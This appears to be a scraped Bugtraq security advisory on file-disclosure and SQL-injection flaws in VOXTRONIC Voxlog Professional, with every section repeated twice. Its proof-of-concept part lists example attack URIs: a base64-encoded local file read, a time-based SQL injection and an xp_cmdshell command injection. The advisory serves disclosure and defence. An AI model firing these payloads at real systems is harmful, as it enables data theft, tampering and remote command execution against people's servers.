VOXTRONIC Voxlog Professional Multiple Security Vulnerabilities
BID:52081
Info
VOXTRONIC Voxlog Professional Multiple Security Vulnerabilities
| Bugtraq ID: | 52081 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 20 2012 12:00AM |
| Updated: | Feb 20 2012 12:00AM |
| Credit: | J. Greil of SEC Consult Vulnerability Lab |
| Vulnerable: |
VOXTRONIC Voxlog Professional 3.7.2.729 VOXTRONIC Voxlog Professional 3.7.0.633 |
| Not Vulnerable: | |
Discussion
VOXTRONIC Voxlog Professional Multiple Security Vulnerabilities
VOXTRONIC Voxlog Professional is prone to a file-disclosure vulnerability and multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
An remote attacker can exploit these issues to obtain potentially sensitive information from local files on computers running the vulnerable application, or modify the logic of SQL queries. A successful exploit may allow the attacker to compromise the software, retrieve information, or modify data; These may aid in further attacks.
VOXTRONIC Voxlog Professional 3.7.2.729 and 3.7.0.633 are vulnerable; other versions may also be affected.
VOXTRONIC Voxlog Professional is prone to a file-disclosure vulnerability and multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
An remote attacker can exploit these issues to obtain potentially sensitive information from local files on computers running the vulnerable application, or modify the logic of SQL queries. A successful exploit may allow the attacker to compromise the software, retrieve information, or modify data; These may aid in further attacks.
VOXTRONIC Voxlog Professional 3.7.2.729 and 3.7.0.633 are vulnerable; other versions may also be affected.
Exploit / POC
VOXTRONIC Voxlog Professional Multiple Security Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/voxlog/GET.PHP?v=ZmlsZT1DOi9ib290LmluaQ==
http://www.example.com/voxlog/sysstat/userlogdetail.php?load=1&idclient[1]=xxx);waitfor delay '0:0:5' --+
http://www.example.com/voxlog/sysstat/userlogdetail.php?load=1&idclient[1]=xxx);exec master..xp_cmdshell 'xxxxx' --+
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/voxlog/GET.PHP?v=ZmlsZT1DOi9ib290LmluaQ==
http://www.example.com/voxlog/sysstat/userlogdetail.php?load=1&idclient[1]=xxx);waitfor delay '0:0:5' --+
http://www.example.com/voxlog/sysstat/userlogdetail.php?load=1&idclient[1]=xxx);exec master..xp_cmdshell 'xxxxx' --+
Solution / Fix
VOXTRONIC Voxlog Professional Multiple Security Vulnerabilities
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
VOXTRONIC Voxlog Professional Multiple Security Vulnerabilities
References:
References:
- VOXTRONIC Homepage (VOXTRONIC)